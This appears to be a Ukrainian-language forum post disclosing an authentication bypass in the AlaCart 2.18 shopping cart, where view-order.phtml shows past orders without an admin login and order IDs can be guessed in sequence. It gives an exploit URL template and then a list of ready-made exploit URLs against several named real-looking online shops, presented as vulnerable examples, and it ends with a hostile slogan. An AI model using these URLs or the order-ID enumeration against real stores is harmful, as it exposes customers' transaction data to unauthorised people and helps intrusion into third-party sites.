Уразливість в системі AlaCart Version 2.18

Мною виявлена уразливість в системі AlaCart Version 2.18

Application: Alabanza AlaCart Shopping Cart
Problem-Type: дистанційна
Vulnerability: перегляд інформації про транзакції.
Vendor: alabanza.com
Risk: низький

Exploit:

http://www.xxx.com/s-cart/view-order.phtml?f_strFirstName=[любые символи] & f_strLastName = [будь-які символи] & f_intOrderID = [номер транзакції]

Файл view-order.phtml дозволяє переглядати інформацію про проведені раніше транзакціях магазину, минаючи введення пароля / логіна адміністратора. Номер транзакції підбирається звичайним перебором 1,2,3 ... 121 і так далі. У разі відсутності запису про наявної транзакції, відповідь сервера:

Order # 135 could not be found or does not exist.

приклад:

http://alacart.metapros.net/s-cart/view-order.phtml?f_strFirstName=Jeff&f_strLastName=Daggs&f_intOrderID=135

Приклад уразливості:

http://notebookmaker.com/s-cart/view-order.phtml?f_strFirstName=aaa&f_strLastName=aaaa&f_intOrderID=129
http://kingfishtackle.com/s-cart/view-order.phtml?f_strFirstName=bbb&f_strLastName=bbb&f_intOrderID=163
http://www.arsenaltraining.com/s-cart/view-order.phtml?f_strFirstName=durito&f_strLastName=durito&f_intOrderID=134
http://lightlens.com/s-cart/view-order.phtml?f_strFirstName=333&f_strLastName=333&f_intOrderID=121
http://www.asbp.org/s-cart/view-order.phtml?f_strFirstName=444&f_strLastName=444&f_intOrderID=121

Твій bug Durito.
_________________
EAT THE RICH!